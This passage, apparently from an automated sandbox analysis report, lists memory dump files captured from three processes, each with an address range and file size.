                                                                                  • memory/2612-93-0x0000000073CB0000-0x000000007439E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2612-96-0x00000000001E0000-0x00000000001E6000-memory.dmp

                                                                                    Filesize

                                                                                    24KB

                                                                                  • memory/2612-50-0x0000000000080000-0x00000000000B0000-memory.dmp

                                                                                    Filesize

                                                                                    192KB

                                                                                  • memory/2612-202-0x0000000073CB0000-0x000000007439E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2612-44-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2612-48-0x0000000000080000-0x00000000000B0000-memory.dmp

                                                                                    Filesize

                                                                                    192KB

                                                                                  • memory/2672-562-0x0000000004450000-0x0000000004490000-memory.dmp

                                                                                    Filesize

                                                                                    256KB

                                                                                  • memory/2672-564-0x0000000000290000-0x0000000000291000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/3004-191-0x0000000073CB0000-0x000000007439E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/3004-41-0x0000000000080000-0x00000000000DA000-memory.dmp

                                                                                    Filesize

                                                                                    360KB

                                                                                  • memory/3004-54-0x0000000000080000-0x00000000000DA000-memory.dmp

                                                                                    Filesize

                                                                                    360KB

                                                                                  • memory/3004-38-0x0000000000080000-0x00000000000DA000-memory.dmp

                                                                                    Filesize

                                                                                    360KB

                                                                                  • memory/3004-55-0x0000000000080000-0x00000000000DA000-memory.dmp

                                                                                    Filesize

                                                                                    360KB

                                                                                  • memory/3004-92-0x0000000073CB0000-0x000000007439E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/3004-273-0x0000000000F50000-0x0000000000F90000-memory.dmp

                                                                                    Filesize

                                                                                    256KB

                                                                                  • memory/3004-157-0x0000000000F50000-0x0000000000F90000-memory.dmp

                                                                                    Filesize

                                                                                    256KB